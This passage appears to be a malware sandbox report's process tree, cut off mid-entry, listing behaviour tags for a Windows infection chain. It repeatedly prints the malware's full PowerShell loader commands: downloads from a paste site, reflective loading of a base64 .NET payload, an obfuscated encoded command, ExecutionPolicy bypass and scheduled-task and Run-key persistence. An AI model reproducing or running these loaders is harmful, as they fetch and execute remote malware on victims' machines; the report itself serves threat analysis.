        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://textbin.net/raw/ezjmofz3s6' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/BhrNSkVt/r/ee.etsap//:sptth'' , ''C:\Windows\system32\EncriptadoOOKK50.vbs'' , ''____________________________________________-------'', ''0134'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"
        7⤵
        Blocklisted process makes network request
        
        PID:2544
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\dll03.ps1
        8⤵
        Blocklisted process makes network request
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:3000
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2456
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        10⤵
        Adds Run key to start application
        
        PID:5236
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Windows\system32\EncriptadoOOKK50.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        9⤵
        
        PID:3224
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Windows\system32\EncriptadoOOKK50.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        9⤵
        
        PID:8
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:3688

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
1⤵
- Hide Artifacts: Hidden Window
PID:3424
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
  2⤵
  PID:3748
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\xx2.vbs"
    3⤵
    - Checks computer location settings
    PID:1968
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\EncriptadoOOKK50.vbs'
      4⤵
      PID:5052
    - - C:\Windows\system32\wscript.exe
        
        "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\Admin\AppData\Local\Temp\EncriptadoOOKK50.vbs
        5⤵
        Checks computer location settings
        
        PID:3844
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /delete /tn task name /f
        6⤵
        
        PID:5440
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /tn task name /tr "C:\Users\Admin\AppData\Local\Temp\GLPd.vbs" /sc minute /mo minutos
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2588
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★Ho★RgBL★GE★QQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwB0★GU★e★B0★GI★aQBu★C4★bgBl★HQ★LwBy★GE★dw★v★GU★egBq★G0★bwBm★Ho★MwBz★DY★Jw★g★Ds★J★BJ★GU★c★BH★FE★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DE★LgB0★Hg★d★★n★Ck★Ow★k★Hc★ZQBi★EM★b★Bp★GU★bgB0★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★UgBW★FU★W★B2★C★★PQ★g★CQ★dwBl★GI★QwBs★Gk★ZQBu★HQ★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★egBG★Es★YQBB★C★★KQ★g★Ds★J★BS★FY★VQBY★HY★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★Ek★ZQBw★Ec★UQ★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★JwBV★FQ★Rg★4★Cc★I★★t★GY★bwBy★GM★ZQ★g★Ds★J★BT★FQ★ZgBH★Gw★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DI★LgB0★Hg★d★★n★Ck★I★★7★CQ★U★Bo★HI★b★BO★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★U★Bo★HI★b★BO★C4★RQBu★GM★bwBk★Gk★bgBn★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBU★GU★e★B0★C4★RQBu★GM★bwBk★Gk★bgBn★F0★Og★6★FU★V★BG★Dg★I★★7★CQ★R★BI★Ho★VQBB★C★★I★★9★C★★K★★g★Ec★ZQB0★C0★QwBv★G4★d★Bl★G4★d★★g★C0★U★Bh★HQ★a★★g★CQ★SQBl★H★★RwBR★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★★9★C★★J★BQ★Gg★cgBs★E4★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★R★BI★Ho★VQBB★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FM★V★Bm★Ec★b★★g★C0★ZgBv★HI★YwBl★C★★Ow★k★E0★TwBE★FI★Zw★g★D0★I★★g★Cc★J★By★Hk★YQBl★Ec★I★★9★C★★K★BH★GU★d★★t★EM★bwBu★HQ★ZQBu★HQ★I★★t★F★★YQB0★Gg★I★★n★Cc★Jw★g★Cs★I★★k★FM★V★Bm★Ec★b★★g★Cs★I★★n★Cc★Jw★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★VQBU★EY★O★★p★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★QgB5★HQ★ZQBb★F0★XQ★g★CQ★RgB5★GY★Z★B6★C★★PQ★g★Fs★cwB5★HM★d★Bl★G0★LgBD★G8★bgB2★GU★cgB0★F0★Og★6★EY★cgBv★G0★QgBh★HM★ZQ★2★DQ★UwB0★HI★aQBu★Gc★K★★g★CQ★cgB5★GE★ZQBH★C4★cgBl★H★★b★Bh★GM★ZQ★o★Cc★Jw★k★CQ★J★★k★Cc★Jw★s★Cc★JwBB★Cc★Jw★p★C★★KQ★g★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★UwB5★HM★d★Bl★G0★LgBB★H★★c★BE★G8★bQBh★Gk★bgBd★Do★Jw★g★Cs★I★★n★Do★QwB1★HI★cgBl★G4★d★BE★G8★bQBh★Gk★bg★u★Ew★bwBh★GQ★K★★g★CQ★RgB5★GY★Z★B6★C★★KQ★u★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBH★GU★d★BU★Hk★c★Bl★Cg★I★★n★Cc★TQBp★HM★ZQBy★Gk★YwBv★HI★Z★Bp★G8★cwBv★EE★bQBl★G4★LgBD★Gw★YQBz★HM★MQ★n★Cc★I★★p★C4★RwBl★HQ★TQ★n★C★★Ow★k★E0★TwBE★FI★Zw★g★Cs★PQ★g★Cc★ZQB0★Gg★bwBk★Cg★I★★n★Cc★TQBz★HE★QgBJ★GI★WQ★n★Cc★I★★p★C4★SQBu★HY★bwBr★GU★K★★g★CQ★bgB1★Gw★b★★g★Cw★I★Bb★G8★YgBq★GU★YwB0★Fs★XQBd★C★★K★★g★Cc★Jw★w★C8★QgBo★HI★TgBT★Gs★VgB0★C8★cg★v★GU★ZQ★u★GU★d★Bz★GE★c★★v★C8★OgBz★H★★d★B0★Gg★Jw★n★C★★L★★g★Cc★Jw★l★Eo★awBR★GE★cwBE★GY★ZwBy★FQ★Zw★l★Cc★Jw★g★Cw★I★★n★Cc★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★C0★LQ★t★C0★LQ★t★C0★Jw★n★Cw★I★★n★Cc★M★★x★DM★N★★n★Cc★L★★g★Cc★Jw★x★Cc★Jw★s★C★★Jw★n★FI★bwBk★GE★Jw★n★C★★I★★p★C★★KQ★g★Ds★Jw★g★Ds★J★BW★EI★VwBX★Ho★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DM★LgBw★HM★MQ★n★C★★KQ★g★Ds★J★BN★E8★R★BS★Gc★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FY★QgBX★Fc★eg★g★C★★LQBm★G8★cgBj★GU★I★★7★H★★bwB3★GU★cgBz★Gg★ZQBs★Gw★I★★t★EU★e★Bl★GM★dQB0★Gk★bwBu★F★★bwBs★Gk★YwB5★C★★QgB5★H★★YQBz★HM★I★★t★EY★aQBs★GU★I★★k★FY★QgBX★Fc★eg★g★Ds★';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Windows\system32\EncriptadoOOKK50.vbs');powershell $Yolopolhggobek;
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3128
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://textbin.net/raw/ezjmofz3s6' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/BhrNSkVt/r/ee.etsap//:sptth'' , ''C:\Windows\system32\EncriptadoOOKK50.vbs'' , ''____________________________________________-------'', ''0134'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"
        7⤵
        Blocklisted process makes network request
        
        PID:3852
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\dll03.ps1
        8⤵
        Blocklisted process makes network request
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:5808
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5708
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        10⤵
        Adds Run key to start application
        
        PID:5480
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Windows\system32\EncriptadoOOKK50.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        9⤵
        
        PID:1140
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Windows\system32\EncriptadoOOKK50.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        9⤵
        
        PID:5404
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:5916

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
1⤵
- Hide Artifacts: Hidden Window
PID:2236
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
  2⤵
  PID:2044
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\xx2.vbs"
    3⤵
    - Checks computer location settings
    PID:1184
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\EncriptadoOOKK50.vbs'
      4⤵
      PID:372
    - - C:\Windows\system32\wscript.exe
        
        "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\Admin\AppData\Local\Temp\EncriptadoOOKK50.vbs
        5⤵
        Checks computer location settings
        
        PID:5940
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /delete /tn task name /f
        6⤵
        
        PID:1168
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /tn task name /tr "C:\Users\Admin\AppData\Local\Temp\GLPd.vbs" /sc minute /mo minutos
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5496
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★Ho★RgBL★GE★QQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwB0★GU★e★B0★GI★aQBu★C4★bgBl★HQ★LwBy★GE★dw★v★GU★egBq★G0★bwBm★Ho★MwBz★DY★Jw★g★Ds★J★BJ★GU★c★BH★FE★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DE★LgB0★Hg★d★★n★Ck★Ow★k★Hc★ZQBi★EM★b★Bp★GU★bgB0★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★UgBW★FU★W★B2★C★★PQ★g★CQ★dwBl★GI★QwBs★Gk★ZQBu★HQ★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★egBG★Es★YQBB★C★★KQ★g★Ds★J★BS★FY★VQBY★HY★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★Ek★ZQBw★Ec★UQ★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★JwBV★FQ★Rg★4★Cc★I★★t★GY★bwBy★GM★ZQ★g★Ds★J★BT★FQ★ZgBH★Gw★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DI★LgB0★Hg★d★★n★Ck★I★★7★CQ★U★Bo★HI★b★BO★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★U★Bo★HI★b★BO★C4★RQBu★GM★bwBk★Gk★bgBn★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBU★GU★e★B0★C4★RQBu★GM★bwBk★Gk★bgBn★F0★Og★6★FU★V★BG★Dg★I★★7★CQ★R★BI★Ho★VQBB★C★★I★★9★C★★K★★g★Ec★ZQB0★C0★QwBv★G4★d★Bl★G4★d★★g★C0★U★Bh★HQ★a★★g★CQ★SQBl★H★★RwBR★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★★9★C★★J★BQ★Gg★cgBs★E4★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★R★BI★Ho★VQBB★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FM★V★Bm★Ec★b★★g★C0★ZgBv★HI★YwBl★C★★Ow★k★E0★TwBE★FI★Zw★g★D0★I★★g★Cc★J★By★Hk★YQBl★Ec★I★★9★C★★K★BH★GU★d★★t★EM★bwBu★HQ★ZQBu★HQ★I★★t★F★★YQB0★Gg★I★★n★Cc★Jw★g★Cs★I★★k★FM★V★Bm★Ec★b★★g★Cs★I★★n★Cc★Jw★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★VQBU★EY★O★★p★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★QgB5★HQ★ZQBb★F0★XQ★g★CQ★RgB5★GY★Z★B6★C★★PQ★g★Fs★cwB5★HM★d★Bl★G0★LgBD★G8★bgB2★GU★cgB0★F0★Og★6★EY★cgBv★G0★QgBh★HM★ZQ★2★DQ★UwB0★HI★aQBu★Gc★K★★g★CQ★cgB5★GE★ZQBH★C4★cgBl★H★★b★Bh★GM★ZQ★o★Cc★Jw★k★CQ★J★★k★Cc★Jw★s★Cc★JwBB★Cc★Jw★p★C★★KQ★g★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★UwB5★HM★d★Bl★G0★LgBB★H★★c★BE★G8★bQBh★Gk★bgBd★Do★Jw★g★Cs★I★★n★Do★QwB1★HI★cgBl★G4★d★BE★G8★bQBh★Gk★bg★u★Ew★bwBh★GQ★K★★g★CQ★RgB5★GY★Z★B6★C★★KQ★u★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBH★GU★d★BU★Hk★c★Bl★Cg★I★★n★Cc★TQBp★HM★ZQBy★Gk★YwBv★HI★Z★Bp★G8★cwBv★EE★bQBl★G4★LgBD★Gw★YQBz★HM★MQ★n★Cc★I★★p★C4★RwBl★HQ★TQ★n★C★★Ow★k★E0★TwBE★FI★Zw★g★Cs★PQ★g★Cc★ZQB0★Gg★bwBk★Cg★I★★n★Cc★TQBz★HE★QgBJ★GI★WQ★n★Cc★I★★p★C4★SQBu★HY★bwBr★GU★K★★g★CQ★bgB1★Gw★b★★g★Cw★I★Bb★G8★YgBq★GU★YwB0★Fs★XQBd★C★★K★★g★Cc★Jw★w★C8★QgBo★HI★TgBT★Gs★VgB0★C8★cg★v★GU★ZQ★u★GU★d★Bz★GE★c★★v★C8★OgBz★H★★d★B0★Gg★Jw★n★C★★L★★g★Cc★Jw★l★Eo★awBR★GE★cwBE★GY★ZwBy★FQ★Zw★l★Cc★Jw★g★Cw★I★★n★Cc★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★C0★LQ★t★C0★LQ★t★C0★Jw★n★Cw★I★★n★Cc★M★★x★DM★N★★n★Cc★L★★g★Cc★Jw★x★Cc★Jw★s★C★★Jw★n★FI★bwBk★GE★Jw★n★C★★I★★p★C★★KQ★g★Ds★Jw★g★Ds★J★BW★EI★VwBX★Ho★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DM★LgBw★HM★MQ★n★C★★KQ★g★Ds★J★BN★E8★R★BS★Gc★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FY★QgBX★Fc★eg★g★C★★LQBm★G8★cgBj★GU★I★★7★H★★bwB3★GU★cgBz★Gg★ZQBs★Gw★I★★t★EU★e★Bl★GM★dQB0★Gk★bwBu★F★★bwBs★Gk★YwB5★C★★QgB5★H★★YQBz★HM★I★★t★EY★aQBs★GU★I★★k★FY★QgBX★Fc★eg★g★Ds★';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Windows\system32\EncriptadoOOKK50.vbs');powershell $Yolopolhggobek;
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5268
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://textbin.net/raw/ezjmofz3s6' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/BhrNSkVt/r/ee.etsap//:sptth'' , ''C:\Windows\system32\EncriptadoOOKK50.vbs'' , ''____________________________________________-------'', ''0134'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"
        7⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        
        PID:1456
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\dll03.ps1
        8⤵
        Blocklisted process makes network request
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:5684
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2180
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        10⤵
        Adds Run key to start application
        
        PID:4076
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Windows\system32\EncriptadoOOKK50.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        9⤵
        
        PID:2508
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Windows\system32\EncriptadoOOKK50.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        9⤵
        
        PID:3920
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        
        PID:4528
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:2688

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
1⤵
- Hide Artifacts: Hidden Window
PID:2624
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
  2⤵
  PID:5332
- - C:\Windows\System32\WScript.exe
